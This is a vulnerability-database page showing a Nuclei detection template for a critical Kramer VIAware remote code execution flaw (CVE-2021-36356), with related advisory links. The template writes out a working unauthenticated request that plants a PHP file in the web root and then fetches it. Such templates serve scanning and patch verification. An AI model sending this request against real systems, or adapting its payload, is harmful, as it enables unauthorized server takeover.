| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
| Kramer VIAware - Remote Code Execution Exploit | 7 Apr 202200:00 | – | zdt | |
| Exploit for Improper Privilege Management in Kramerav Viaware | 2 Jun 202202:19 | – | githubexploit | |
| CVE-2021-35064 | 12 Jul 202100:00 | – | attackerkb | |
| CVE-2021-36356 | 31 Aug 202100:00 | – | attackerkb | |
| CVE-2021-35064 | 13 Jul 202213:02 | – | circl | |
| CVE-2021-36356 | 31 Aug 202107:33 | – | circl | |
| VIAware 安全漏洞 | 12 Jul 202100:00 | – | cnnvd | |
| Kramer Electronics VIAware 代码问题漏洞 | 31 Aug 202100:00 | – | cnnvd | |
| Unspecified Vulnerability in VIAware | 15 Jul 202100:00 | – | cnvd | |
| CVE-2021-35064 | 12 Jul 202111:09 | – | cve |
id: CVE-2021-36356
info:
name: Kramer VIAware - Remote Code Execution
author: gy741
severity: critical
description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames.
impact: |
Unauthenticated attackers can upload arbitrary PHP files to the web root, achieving remote code execution and complete server compromise.
remediation: |
Apply the latest firmware update provided by Kramer to fix the vulnerability and ensure proper input validation in the web interface.
reference:
- https://www.exploit-db.com/exploits/50856
- https://nvd.nist.gov/vuln/detail/CVE-2021-36356
- https://nvd.nist.gov/vuln/detail/CVE-2021-35064
- https://write-up.github.io/kramerav/
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-36356
cwe-id: CWE-434
epss-score: 0.54393
epss-percentile: 0.98889
cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: kramerav
product: viaware
tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav,vkev,vuln
variables:
useragent: "{{rand_base(6)}}"
http:
- raw:
- |
POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
radioBtnVal=%3C%3Fphp+echo+md5%28%22CVE-2021-35064%22%29%3B+%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php
- |
GET /{{randstr}}.php' HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body_2
words:
- "44f63b292601ec4ab0d8c3244c9f5ebe"
# digest: 4b0a00483046022100a6f0169127ffc750f7495c31ca42fa5f7c38907a7dcf0d41902ee827b4e5c82f022100dfecd25f10571275d7062349bf94ff33827f662e83b4bfacdc9d79fad58280bf:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation